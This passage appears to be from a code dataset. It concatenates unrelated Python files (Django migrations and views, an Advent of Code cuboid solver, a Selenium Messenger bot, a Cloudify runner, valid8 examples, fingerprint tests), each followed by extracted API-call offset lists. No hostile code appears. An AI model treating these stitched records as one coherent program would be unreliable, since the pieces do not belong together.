        parts = name.split(" ")
        # TODO: rewrite completely
        pos = 0
        # Grow the affix until it matches a catalogue entry.
        self.affix = ""
        while pos < len(parts):
            if len(self.affix) > 0:
                self.affix += " "
            self.affix += parts[pos]
            pos += 1
            self.affix = self.affix.strip()
            if self.slot == ITEM_SLOT_WEAPON:
                if self.affix in Item.weapon_list["affixes"]:
                    break
            elif self.slot == ITEM_SLOT_ARMOR:
                if self.affix in Item.armor_list["affixes"]:
                    break
        # Then the type, continuing from where the affix stopped.
        self.type = ""
        while pos < len(parts):
            if len(self.type) > 0:
                self.type += " "
            self.type += parts[pos]
            pos += 1
            self.type = self.type.strip()
            if self.slot == ITEM_SLOT_WEAPON:
                if self.type in Item.weapon_list["types"]:
                    break
            elif self.slot == ITEM_SLOT_ARMOR:
                if self.type in Item.armor_list["types"]:
                    break
        # Finally the suffix consumes the remaining words.
        self.suffix = ""
        while pos < len(parts):
            if len(self.suffix) > 0:
                self.suffix += " "
            self.suffix += parts[pos]
            pos += 1
            self.suffix = self.suffix.strip()
            if self.slot == ITEM_SLOT_WEAPON:
                if self.suffix in Item.weapon_list["suffixes"]:
                    break
            elif self.slot == ITEM_SLOT_ARMOR:
                if self.suffix in Item.armor_list["suffixes"]:
                    break
    def equip(self, owner):
        """Attach the item to ``owner`` and slot it as weapon or armor."""
        self.owner = owner
        if self.slot == ITEM_SLOT_WEAPON:
            owner.weapon = self
        elif self.slot == ITEM_SLOT_ARMOR:
            owner.armor = self
    def translate(self, is_ablative: bool = False, is_accusative: bool = False) -> str:
        """Localized "name + level" string in the requested grammatical case."""
        return "{0} + {1}".format(self.name_in_form(is_ablative=is_ablative, is_accusative=is_accusative), self.level)
    def __str__(self):
        return "{0} + {1}".format(self.name, self.level)
| [
"random.random"
] | [((787, 802), 'random.random', 'random.random', ([], {}), '()\n', (800, 802), False, 'import random\n')] |
# Generated by Django 3.2.7 on 2021-12-13 15:25
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: allow NULL in Order.additional."""
    dependencies = [
        ('order', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='order',
            name='additional',
            field=models.TextField(null=True),
        ),
    ]
| [
"django.db.models.TextField"
] | [((326, 353), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (342, 353), False, 'from django.db import migrations, models\n')] |
from copy import copy
from collections import defaultdict, namedtuple
with open("day22.in") as f:
# with open("day22.small.in") as f:
    lines = f.read().splitlines()
# Part 1: brute-force the first 20 instructions cell by cell.
# (`lines` is reused by the part-2 code further down.)
reactor = defaultdict(bool)
for line in lines[:20]:
    # on x=0..45,y=-21..27,z=-28..20
    # print(line)
    switch, coords = line.split()
    x, y, z = coords.split(",")
    # Each axis spec looks like "x=0..45"; split off the bounds.
    xmin, xmax = [int(v) for v in x.split("=")[1].split("..")]
    ymin, ymax = [int(v) for v in y.split("=")[1].split("..")]
    zmin, zmax = [int(v) for v in z.split("=")[1].split("..")]
    for x in range(xmin, xmax + 1):
        for y in range(ymin, ymax + 1):
            for z in range(zmin, zmax + 1):
                reactor[(x, y, z)] = True if switch == "on" else False
print(sum([1 if v else 0 for v in reactor.values()]))
class Range(object):
    """An inclusive integer interval [rmin, rmax]."""

    def __init__(self, rmin, rmax):
        self.rmin = rmin
        self.rmax = rmax

    def span(self):
        """Number of integer coordinates covered (bounds inclusive)."""
        return abs(self.rmax - self.rmin + 1)

    def contains(self, block):
        """True if the single coordinate ``block`` lies inside the range."""
        return self.rmin <= block <= self.rmax

    def overlaps(self, other):
        """True if the two ranges share at least one coordinate.

        BUGFIX: the original only tested whether ``other``'s endpoints lie
        inside ``self``, which misses the case where ``other`` strictly
        contains ``self`` (e.g. [0, 10] vs [-5, 15]).  Also checking one of
        ``self``'s endpoints against ``other`` makes the predicate
        symmetric.  (intersection() checked includes() first, so program
        behavior elsewhere is unchanged.)
        """
        return (
            self.contains(other.rmin)
            or self.contains(other.rmax)
            or other.contains(self.rmin)
        )

    def includes(self, other):
        """True if ``other`` lies entirely inside ``self``."""
        return self.contains(other.rmin) and self.contains(other.rmax)

    def intersection(self, other):
        """Return the overlapping Range, or None if the ranges are disjoint."""
        if self.includes(other):
            return other
        if other.includes(self):
            return self
        if not self.overlaps(other):
            return None
        # Partial overlap: clip to whichever endpoints fall inside self.
        if self.contains(other.rmin) and self.contains(other.rmax):
            return Range(other.rmin, other.rmax)
        elif self.contains(other.rmin):
            return Range(other.rmin, self.rmax)
        elif self.contains(other.rmax):
            return Range(self.rmin, other.rmax)

    def __str__(self):
        return "%d..%d" % (self.rmin, self.rmax)
class Cuboid(object):
    """An axis-aligned box of reactor cells with an on/off state.

    Overlaps with later instructions are recorded in ``exclusions`` so
    that each cell is counted only by the last instruction touching it
    (inclusion-exclusion, applied recursively).
    """
    def __init__(self, xrange, yrange, zrange, on):
        self.xrange = xrange
        self.yrange = yrange
        self.zrange = zrange
        self.on = on
        # Sub-cuboids claimed by later instructions; excluded from num_on().
        self.exclusions = []
    def volume(self):
        # Raw volume, ignoring exclusions.
        return self.xrange.span() * self.yrange.span() * self.zrange.span()
    def exclusive_volume(self):
        # Volume minus everything owned by later instructions.  Recursive,
        # because the exclusions also exclude each other pairwise.
        return (self.xrange.span() * self.yrange.span() * self.zrange.span() -
                sum([e.exclusive_volume() for e in self.exclusions]))
    def contains(self, other):
        # True if other fits entirely inside self on all three axes.
        return all([self.xrange.includes(other.xrange),
                    self.yrange.includes(other.yrange),
                    self.zrange.includes(other.zrange)])
    def intersect(self, other):
        """Return the overlap Cuboid (carrying other's state), or None."""
        xint = self.xrange.intersection(other.xrange)
        yint = self.yrange.intersection(other.yrange)
        zint = self.zrange.intersection(other.zrange)
        if all([intersection is not None for intersection in [xint, yint, zint]]):
            overlap = Cuboid(xint, yint, zint, other.on)
            return overlap
        else:
            return None
    def exclude(self, other):
        """Hand the overlap with ``other`` over to it (other wins the cells)."""
        overlap = self.intersect(other)
        if not overlap:
            return
        # The new overlap must also be excluded from every existing
        # exclusion, so no cell is subtracted twice.
        for e in self.exclusions:
            e.exclude(overlap)
        self.exclusions.append(overlap)
        return overlap
    def num_on(self):
        # Cells this instruction is the final authority for, if it turns on.
        return self.exclusive_volume() if self.on else 0
    def __str__(self):
        return "Cuboid(x=%s,y=%s,z=%s,%s)" % (self.xrange, self.yrange, self.zrange, self.on)
# Part 2: full coordinate space via cuboid inclusion-exclusion.
original_cubes = []
for line in lines:
    # on x=0..45,y=-21..27,z=-28..20
    # print(line)
    switch, coords = line.split()
    x, y, z = coords.split(",")
    xmin, xmax = [int(v) for v in x.split("=")[1].split("..")]
    ymin, ymax = [int(v) for v in y.split("=")[1].split("..")]
    zmin, zmax = [int(v) for v in z.split("=")[1].split("..")]
    c = Cuboid(Range(xmin, xmax), Range(ymin, ymax), Range(zmin, zmax), switch == "on")
    original_cubes.append(c)
# Every earlier cuboid cedes its overlap to each later one, so each cell
# is counted only by the last instruction that touches it.
for i, ic in enumerate(original_cubes):
    for j, jc in enumerate(original_cubes):
        if i < j:
            original_cubes[i].exclude(original_cubes[j])
print(sum([c.num_on() for c in original_cubes]))
| [
"collections.defaultdict"
] | [((180, 197), 'collections.defaultdict', 'defaultdict', (['bool'], {}), '(bool)\n', (191, 197), False, 'from collections import defaultdict, namedtuple\n')] |
# Generated by Django 3.1.7 on 2021-03-26 08:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration: create MuscleGroup and Muscle tables.

    Muscle holds a nullable FK to MuscleGroup (SET_NULL on delete).
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='MuscleGroup',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, max_length=1000)),
                ('benefits', models.TextField(blank=True, max_length=1000)),
                ('basics', models.TextField(blank=True, max_length=1000)),
            ],
        ),
        migrations.CreateModel(
            name='Muscle',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, max_length=1000)),
                ('basics', models.TextField(blank=True, max_length=1000)),
                ('muscle_group', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='body.musclegroup')),
            ],
        ),
    ]
| [
"django.db.models.TextField",
"django.db.models.AutoField",
"django.db.models.CharField",
"django.db.models.ForeignKey"
] | [((340, 433), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (356, 433), False, 'from django.db import migrations, models\n'), ((457, 489), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (473, 489), False, 'from django.db import migrations, models\n'), ((524, 569), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (540, 569), False, 'from django.db import migrations, models\n'), ((601, 646), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (617, 646), False, 'from django.db import migrations, models\n'), ((676, 721), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (692, 721), False, 'from django.db import migrations, models\n'), ((853, 946), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (869, 946), False, 'from django.db import migrations, models\n'), ((970, 1002), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (986, 1002), False, 'from django.db import migrations, models\n'), ((1037, 1082), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (1053, 1082), False, 'from django.db import migrations, models\n'), ((1112, 1157), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), 
'(blank=True, max_length=1000)\n', (1128, 1157), False, 'from django.db import migrations, models\n'), ((1193, 1294), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.SET_NULL', 'to': '"""body.musclegroup"""'}), "(null=True, on_delete=django.db.models.deletion.SET_NULL,\n to='body.musclegroup')\n", (1210, 1294), False, 'from django.db import migrations, models\n')] |
from shaape.parser import Parser
import nose
import unittest
from nose.tools import *
class TestParser(unittest.TestCase):
    """Unit tests for the abstract Parser base class."""
    def test_init(self):
        """A fresh parser exposes empty parsed data and drawables."""
        parser = Parser()
        # IDIOM FIX: comparisons against None use identity (PEP 8);
        # `!= None` invoked equality and is never the right spelling.
        assert parser is not None
        assert parser.parsed_data() == []
        assert parser.drawable_objects() == []
    def test_run(self):
        """run() must stay abstract on the base class."""
        parser = Parser()
        assert_raises(NotImplementedError, parser.run, "", [])
| [
"shaape.parser.Parser"
] | [((166, 174), 'shaape.parser.Parser', 'Parser', ([], {}), '()\n', (172, 174), False, 'from shaape.parser import Parser\n'), ((336, 344), 'shaape.parser.Parser', 'Parser', ([], {}), '()\n', (342, 344), False, 'from shaape.parser import Parser\n')] |
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render, redirect
from .forms import *
from .models import *
from django.contrib import messages
# Create your views here.
from django.views import View
# def index(request):
# return render(request, 'product/create_product.html')
#
#
# class ProtectView(LoginRequiredMixin, View):
# def get(self, request):
# return render(request, 'product/create_product.html')
def create_product_category(request):
    """Create a ProductCategory from a POST and list existing categories.

    On a valid POST redirects back to this view; otherwise renders the
    (possibly error-carrying) form together with all categories.
    """
    # FIX: instantiate the form instead of passing the class.  Relying on
    # the template engine auto-calling the class is fragile — e.g. any
    # attribute access on `form` in view code would hit the class, not an
    # instance.
    form = ProductCategoryCreateForm()
    if request.method == 'POST':
        form = ProductCategoryCreateForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('product:create_category')
    category = ProductCategory.objects.all()
    ctx = {
        'form': form,
        'category': category
    }
    return render(request, 'product/create_product_category.html', ctx)
def create_product(request):
    """Create a Product from a POST, flashing a success message on save.

    On a valid POST redirects to the product list; otherwise renders the
    (possibly error-carrying) form.
    """
    # FIX: instantiate the form instead of passing the class (same reason
    # as in create_product_category — templates auto-call callables, but
    # view-side attribute access on the class would misbehave).
    form = ProductCreateForm()
    if request.method == 'POST':
        form = ProductCreateForm(request.POST)
        if form.is_valid():
            form.save()
            messages.success(request, 'Product Created Successfully')
            return redirect('product:list')
    ctx = {
        'form': form,
    }
    return render(request, 'product/create_product.html', ctx)
def product_list(request):
    """Render the full product catalogue."""
    context = {
        'product': Product.objects.all(),
    }
    return render(request, 'product/product_list.html', context)
| [
"django.shortcuts.render",
"django.shortcuts.redirect",
"django.contrib.messages.success"
] | [((864, 924), 'django.shortcuts.render', 'render', (['request', '"""product/create_product_category.html"""', 'ctx'], {}), "(request, 'product/create_product_category.html', ctx)\n", (870, 924), False, 'from django.shortcuts import render, redirect\n'), ((1282, 1333), 'django.shortcuts.render', 'render', (['request', '"""product/create_product.html"""', 'ctx'], {}), "(request, 'product/create_product.html', ctx)\n", (1288, 1333), False, 'from django.shortcuts import render, redirect\n'), ((1456, 1505), 'django.shortcuts.render', 'render', (['request', '"""product/product_list.html"""', 'ctx'], {}), "(request, 'product/product_list.html', ctx)\n", (1462, 1505), False, 'from django.shortcuts import render, redirect\n'), ((703, 738), 'django.shortcuts.redirect', 'redirect', (['"""product:create_category"""'], {}), "('product:create_category')\n", (711, 738), False, 'from django.shortcuts import render, redirect\n'), ((1129, 1186), 'django.contrib.messages.success', 'messages.success', (['request', '"""Product Created Successfully"""'], {}), "(request, 'Product Created Successfully')\n", (1145, 1186), False, 'from django.contrib import messages\n'), ((1206, 1230), 'django.shortcuts.redirect', 'redirect', (['"""product:list"""'], {}), "('product:list')\n", (1214, 1230), False, 'from django.shortcuts import render, redirect\n')] |
from gensim.models import Word2Vec
from gensim.models.keyedvectors import KeyedVectors
import numpy as np
# Load pretrained Chinese skip-gram vectors in word2vec binary format.
word_vectors = KeyedVectors.load_word2vec_format('../data/cn.skipgram.bin/cn.skipgram.bin', binary=True,
                                                  unicode_errors='ignore')
# Word Mover's Distance between token lists: larger means less similar.
print(word_vectors.wmdistance(['中国', '打败', '美国'], ['游戏', '好玩']))
print(word_vectors.wmdistance(['游戏', '好玩'], ['游戏', '好玩']))
print(word_vectors.wmdistance(['中国', '打败', '美国'], ['中国', '打败', '美国']))
print(word_vectors.wmdistance(['中国', '打败', '美国'], ['美国', '中国', '打败']))
| [
"gensim.models.keyedvectors.KeyedVectors.load_word2vec_format"
] | [((122, 240), 'gensim.models.keyedvectors.KeyedVectors.load_word2vec_format', 'KeyedVectors.load_word2vec_format', (['"""../data/cn.skipgram.bin/cn.skipgram.bin"""'], {'binary': '(True)', 'unicode_errors': '"""ignore"""'}), "('../data/cn.skipgram.bin/cn.skipgram.bin',\n binary=True, unicode_errors='ignore')\n", (155, 240), False, 'from gensim.models.keyedvectors import KeyedVectors\n')] |
from selenium.webdriver.remote.webdriver import WebDriver
from actions.handlers import hello, corona
import re
regex = re.compile('^bleep blop')
def login(browser: WebDriver, username: str, pwd: str) -> WebDriver:
    """Sign in to Facebook (mbasic) with the given credentials and return the driver."""
    browser.get('https://mbasic.facebook.com/messages/')
    email_field = browser.find_element_by_css_selector('#login_form input[name="email"]')
    email_field.send_keys(username)
    password_field = browser.find_element_by_css_selector('#login_form input[name="pass"]')
    password_field.send_keys(pwd)
    submit_button = browser.find_element_by_css_selector('#login_form input[type="submit"][name="login"]')
    submit_button.click()
    return browser
def open_chat(browser: WebDriver, id: str) -> WebDriver:
    """Navigate to the mbasic conversation for the given thread id."""
    thread_url = 'https://mbasic.facebook.com/messages/read/?tid=cid.{0}'.format(id)
    browser.get(thread_url)
    return browser
def check_message(browser: WebDriver) -> list:
    """Collect message texts from the open conversation.

    Any message matching the "bleep blop" marker (the bot's own sign-off)
    resets the accumulator, so the returned list holds the marker message
    followed by everything received after the bot's last reply.
    """
    ret_m = []
    # Boilerplate strings Facebook injects that are not real content.
    skip_texts = ['', 'Sent from Mobile', 'Sent from Messenger', 'Sent from Web']
    messages = browser.find_elements_by_css_selector('#messageGroup > div:nth-child(2) span')
    for message in messages:
        text = message.text
        if text in skip_texts:
            continue
        if regex.match(text):
            # Bot's own marker: drop everything collected so far.
            ret_m = []
        ret_m.append(text)
    return ret_m
def reply_message(browser: WebDriver, input_text: str) -> WebDriver:
    """Dispatch ``input_text`` to the chat handlers and sign off if one replied."""
    def _send_message(t: str, wb: WebDriver = browser) -> callable:
        # Type into the composer and press send.
        wb.find_element_by_id('composerInput').send_keys(t)
        wb.find_element_by_css_selector('#composer_form input[type="submit"][name="send"]').click()
    # Handlers short-circuit: corona only runs if hello did not handle it.
    flag = hello.handle(_send_message, input_text) \
        or corona.handle(_send_message, input_text)
    if flag:
        # Marker used by check_message() to recognise the bot's last reply.
        _send_message('bleep blop')
    return browser
| [
"actions.handlers.hello.handle",
"actions.handlers.corona.handle",
"re.compile"
] | [((120, 145), 're.compile', 're.compile', (['"""^bleep blop"""'], {}), "('^bleep blop')\n", (130, 145), False, 'import re\n'), ((1489, 1528), 'actions.handlers.hello.handle', 'hello.handle', (['_send_message', 'input_text'], {}), '(_send_message, input_text)\n', (1501, 1528), False, 'from actions.handlers import hello, corona\n'), ((1545, 1585), 'actions.handlers.corona.handle', 'corona.handle', (['_send_message', 'input_text'], {}), '(_send_message, input_text)\n', (1558, 1585), False, 'from actions.handlers import hello, corona\n')] |
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import argparse
from cloudify_rest_client import CloudifyClient
from cloudify.workflows import local
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('workflow')
arg_parser.add_argument('blueprint_path')
arg_parser.add_argument('--name', default='local')
arg_parser.add_argument('--storage_dir', default='/tmp/cloudify-workflows')
arg_parser.add_argument('--init', action='store_true')
arg_parser.add_argument('--bootstrap', action='store_true')
arg_parser.add_argument('--pool-size', type=int, default=1)
args = arg_parser.parse_args()
storage = local.FileStorage(args.storage_dir)
name = args.name
if args.init:
env = local.init_env(args.blueprint_path, name=name, storage=storage)
else:
env = local.load_env(name=name, storage=storage)
env.execute(args.workflow,
task_retries=3,
task_retry_interval=1,
task_thread_pool_size=args.pool_size)
if args.bootstrap:
outputs = env.outputs()
provider = outputs['provider']['value']
provider_context = provider['context'][0] or {}
bootstrap_context = outputs['cloudify']['value']
agent_key_path = bootstrap_context['cloudify_agent'][
'agent_key_path'][0]
bootstrap_context['cloudify_agent'][
'agent_key_path'] = agent_key_path
provider_context['cloudify'] = bootstrap_context
management_endpoint = outputs['management_endpoint']['value'][0]
rest = CloudifyClient(management_endpoint['manager_ip'])
rest.manager.create_context(provider['name'],
provider_context)
| [
"argparse.ArgumentParser",
"cloudify.workflows.local.FileStorage",
"cloudify.workflows.local.load_env",
"cloudify.workflows.local.init_env",
"cloudify_rest_client.CloudifyClient"
] | [((792, 817), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (815, 817), False, 'import argparse\n'), ((1276, 1311), 'cloudify.workflows.local.FileStorage', 'local.FileStorage', (['args.storage_dir'], {}), '(args.storage_dir)\n', (1293, 1311), False, 'from cloudify.workflows import local\n'), ((1365, 1428), 'cloudify.workflows.local.init_env', 'local.init_env', (['args.blueprint_path'], {'name': 'name', 'storage': 'storage'}), '(args.blueprint_path, name=name, storage=storage)\n', (1379, 1428), False, 'from cloudify.workflows import local\n'), ((1453, 1495), 'cloudify.workflows.local.load_env', 'local.load_env', ([], {'name': 'name', 'storage': 'storage'}), '(name=name, storage=storage)\n', (1467, 1495), False, 'from cloudify.workflows import local\n'), ((2264, 2313), 'cloudify_rest_client.CloudifyClient', 'CloudifyClient', (["management_endpoint['manager_ip']"], {}), "(management_endpoint['manager_ip'])\n", (2278, 2313), False, 'from cloudify_rest_client import CloudifyClient\n')] |
import sys
def inline_validate_1(s):
from valid8 import validate
validate('s', s, instance_of=str, min_len=1)
validate('s', s, equals=s.lower())
def inline_validate_2(s):
from valid8 import validate
validate('s', s, instance_of=str, min_len=1, custom=str.islower)
def inline_validate_3(s):
from valid8 import validate
# we create a custom mini_lambda variable, since the name 's' is already used
from mini_lambda import InputVar
txt = InputVar('txt', str)
validate('s', s, instance_of=str, min_len=1, custom=txt.islower())
def with_validator(s):
from valid8 import validator
with validator('s', s, instance_of=str) as v:
v.alid = (len(s) > 0) and s.islower()
def function_input_builtin_stdlib(value):
from valid8 import validate_arg
from valid8.validation_lib import instance_of, minlen
@validate_arg('s', instance_of(str), minlen(1), str.islower)
def my_function(s):
pass
my_function(value)
def function_input_mini_lambda(value):
from mini_lambda import s, Len
from valid8 import validate_arg
from valid8.validation_lib import instance_of
@validate_arg('s', instance_of(str), Len(s) > 0, s.islower())
def my_function(s):
pass
my_function(value)
def class_field_builtin_stdlib(value):
from valid8 import validate_field
from valid8.validation_lib import instance_of, minlen
@validate_field('s', instance_of(str), minlen(1), str.islower)
class Foo:
def __init__(self, s):
self.s = s
Foo(value)
def class_field_mini_lambda(value):
from mini_lambda import s, Len
from valid8 import validate_field
from valid8.validation_lib import instance_of
@validate_field('s', instance_of(str), Len(s) > 0, s.islower())
class Foo:
def __init__(self, s):
self.s = s
Foo(value)
if sys.version_info >= (3, 0):
from ._tests_pep484 import ex2_pep484 as pep484
| [
"valid8.validator",
"valid8.validate",
"mini_lambda.s.islower",
"valid8.validation_lib.minlen",
"mini_lambda.s.lower",
"mini_lambda.Len",
"valid8.validation_lib.instance_of",
"mini_lambda.InputVar"
] | [((75, 119), 'valid8.validate', 'validate', (['"""s"""', 's'], {'instance_of': 'str', 'min_len': '(1)'}), "('s', s, instance_of=str, min_len=1)\n", (83, 119), False, 'from valid8 import validate\n'), ((223, 287), 'valid8.validate', 'validate', (['"""s"""', 's'], {'instance_of': 'str', 'min_len': '(1)', 'custom': 'str.islower'}), "('s', s, instance_of=str, min_len=1, custom=str.islower)\n", (231, 287), False, 'from valid8 import validate\n'), ((478, 498), 'mini_lambda.InputVar', 'InputVar', (['"""txt"""', 'str'], {}), "('txt', str)\n", (486, 498), False, 'from mini_lambda import InputVar\n'), ((637, 671), 'valid8.validator', 'validator', (['"""s"""', 's'], {'instance_of': 'str'}), "('s', s, instance_of=str)\n", (646, 671), False, 'from valid8 import validator\n'), ((886, 902), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (897, 902), False, 'from valid8.validation_lib import instance_of\n'), ((904, 913), 'valid8.validation_lib.minlen', 'minlen', (['(1)'], {}), '(1)\n', (910, 913), False, 'from valid8.validation_lib import instance_of, minlen\n'), ((1175, 1191), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (1186, 1191), False, 'from valid8.validation_lib import instance_of\n'), ((1205, 1216), 'mini_lambda.s.islower', 's.islower', ([], {}), '()\n', (1214, 1216), False, 'from mini_lambda import s, Len\n'), ((1442, 1458), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (1453, 1458), False, 'from valid8.validation_lib import instance_of\n'), ((1460, 1469), 'valid8.validation_lib.minlen', 'minlen', (['(1)'], {}), '(1)\n', (1466, 1469), False, 'from valid8.validation_lib import instance_of, minlen\n'), ((1756, 1772), 'valid8.validation_lib.instance_of', 'instance_of', (['str'], {}), '(str)\n', (1767, 1772), False, 'from valid8.validation_lib import instance_of\n'), ((1786, 1797), 'mini_lambda.s.islower', 's.islower', ([], {}), '()\n', (1795, 1797), False, 'from mini_lambda 
import s, Len\n'), ((148, 157), 'mini_lambda.s.lower', 's.lower', ([], {}), '()\n', (155, 157), False, 'from mini_lambda import s, Len\n'), ((712, 723), 'mini_lambda.s.islower', 's.islower', ([], {}), '()\n', (721, 723), False, 'from mini_lambda import s, Len\n'), ((1193, 1199), 'mini_lambda.Len', 'Len', (['s'], {}), '(s)\n', (1196, 1199), False, 'from mini_lambda import s, Len\n'), ((1774, 1780), 'mini_lambda.Len', 'Len', (['s'], {}), '(s)\n', (1777, 1780), False, 'from mini_lambda import s, Len\n')] |
import os
import pandas as pd
import data
import make_fingerprint as mf
def test_load_logfile():
# given
trace_file_name = "test/data/filtering_test.txt"
#must_include_head = ["POSI;", "WIFI;", "MAGN;"]
must_include_head = ["POSI;", "WIFI;"]
# when
filtered_lines = mf.load_logfile(trace_file_name, must_include_head)
# then
assert "ACCE;" not in filtered_lines[:100]
assert len(filtered_lines) == 4
def test_bind_wifi_fingerprints():
# given
trace_file_name = "test/data/wifi_calibration.txt"
must_include_head = ["POSI;", "WIFI;"]
filtered_lines = mf.load_logfile(trace_file_name, must_include_head)
# when
fps, _ = mf.bind_wifi_fingerprints(filtered_lines)
# then
assert len(fps[0].wifi_dict) == 2
assert fps[0].timestamp == 61.472
assert fps[0].last_landmark == 1
assert len(fps[1].wifi_dict) == 3
assert fps[1].timestamp == 68.396
assert fps[1].last_landmark == 1
assert len(fps[2].wifi_dict) == 4
assert fps[2].timestamp == 115.986
assert fps[2].last_landmark == 2
assert len(fps) == 3
def test_fill_latitude_longitude():
# given
posis = data.load_from_json_file(
"test/data/test_posis.json", data.POSI
)
assert len(posis) == 4
fps = data.load_from_json_file(
"test/data/test_fps.json", data.WifiFingerprint
)
assert len(fps) == 50
assert fps[0].latitude is None
assert fps[0].longitude is None
# when
fps_new = mf.fill_latitude_longitude(fps, posis)
# then
assert fps_new[0].latitude is not None
assert fps_new[0].longitude is not None
def test_save_fingerprint_as_csv():
# given
posis = data.load_from_json_file(
"test/data/test_posis.json", data.POSI
)
assert len(posis) == 4
fps = data.load_from_json_file(
"test/data/test_fps.json", data.WifiFingerprint
)
assert len(fps) == 50
fps = mf.fill_latitude_longitude(fps, posis)
assert fps[0].latitude is not None
assert fps[0].longitude is not None
assert fps[0].region is None
assert len(fps[0].wifi_dict.keys()) == 34
assert str(list(fps[0].wifi_dict.values())[0]) == "WIFI(timestamp=64.373, sensor_timestamp=12313.167, ssid_name='SSID_0012', mac='20:19:00:00:00:53', freq=2412, rssi=-32)"
fps = mf.bucketization(fps)
assert fps[0].region is not None
test_csv_file_name = "test.csv"
if os.path.isfile(test_csv_file_name):
os.remove(test_csv_file_name)
assert os.path.isfile(test_csv_file_name) is False
# when
data.save_fingerprint_as_csv(test_csv_file_name, fps)
# then
assert os.path.isfile(test_csv_file_name) is True
df = pd.read_csv(test_csv_file_name)
os.remove(test_csv_file_name) | [
"make_fingerprint.load_logfile",
"make_fingerprint.fill_latitude_longitude",
"make_fingerprint.bind_wifi_fingerprints",
"data.load_from_json_file",
"pandas.read_csv",
"os.path.isfile",
"data.save_fingerprint_as_csv",
"make_fingerprint.bucketization",
"os.remove"
] | [((293, 344), 'make_fingerprint.load_logfile', 'mf.load_logfile', (['trace_file_name', 'must_include_head'], {}), '(trace_file_name, must_include_head)\n', (308, 344), True, 'import make_fingerprint as mf\n'), ((613, 664), 'make_fingerprint.load_logfile', 'mf.load_logfile', (['trace_file_name', 'must_include_head'], {}), '(trace_file_name, must_include_head)\n', (628, 664), True, 'import make_fingerprint as mf\n'), ((690, 731), 'make_fingerprint.bind_wifi_fingerprints', 'mf.bind_wifi_fingerprints', (['filtered_lines'], {}), '(filtered_lines)\n', (715, 731), True, 'import make_fingerprint as mf\n'), ((1177, 1241), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_posis.json"""', 'data.POSI'], {}), "('test/data/test_posis.json', data.POSI)\n", (1201, 1241), False, 'import data\n'), ((1294, 1367), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_fps.json"""', 'data.WifiFingerprint'], {}), "('test/data/test_fps.json', data.WifiFingerprint)\n", (1318, 1367), False, 'import data\n'), ((1506, 1544), 'make_fingerprint.fill_latitude_longitude', 'mf.fill_latitude_longitude', (['fps', 'posis'], {}), '(fps, posis)\n', (1532, 1544), True, 'import make_fingerprint as mf\n'), ((1707, 1771), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_posis.json"""', 'data.POSI'], {}), "('test/data/test_posis.json', data.POSI)\n", (1731, 1771), False, 'import data\n'), ((1824, 1897), 'data.load_from_json_file', 'data.load_from_json_file', (['"""test/data/test_fps.json"""', 'data.WifiFingerprint'], {}), "('test/data/test_fps.json', data.WifiFingerprint)\n", (1848, 1897), False, 'import data\n'), ((1948, 1986), 'make_fingerprint.fill_latitude_longitude', 'mf.fill_latitude_longitude', (['fps', 'posis'], {}), '(fps, posis)\n', (1974, 1986), True, 'import make_fingerprint as mf\n'), ((2333, 2354), 'make_fingerprint.bucketization', 'mf.bucketization', (['fps'], {}), '(fps)\n', (2349, 2354), True, 'import 
